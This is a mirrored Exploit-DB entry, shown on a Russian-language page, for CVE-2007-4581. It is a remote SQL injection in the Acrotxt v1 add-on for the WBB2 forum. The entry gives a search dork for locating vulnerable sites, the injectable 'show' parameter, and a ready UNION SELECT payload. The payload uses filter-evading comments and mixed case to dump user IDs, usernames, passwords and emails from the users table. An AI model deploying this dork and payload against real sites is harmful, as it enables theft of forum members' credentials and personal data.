- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4327
- Проверка EDB
-
- Пройдено
- Автор
- D4M14N
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-4581
- Дата публикации
- 2007-08-27
Код:
####################################################################
Title: WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection
Bug by: D4m14n [11/07/2007]
Page: www.damians-world.dl.am // www.team-internet.dl.am
Dork: inurl:acrotxt.php wbb
####################################################################
SQL-Injection:
http://[target]/[path]/acrotxt.php?show=[SQL]
Example:
/acrotxt.php?show=-1'/**/UnIoN/**/SElECt/**/null,null,COnCAt(userid,', ',username,', ',password,', ',email),null,null,null,null,null/**/FroM/**/bb1_users/*
####################################################################
# Doin' this for FUN!
# GreetZ fly out to Trex, HANN!BAL, Eddy14, Ea$y, Kiba and many more
#
# PS: I still hate the Black-Music-Scene...
####################################################################
# milw0rm.com [2007-08-27]- Источник
- www.exploit-db.com
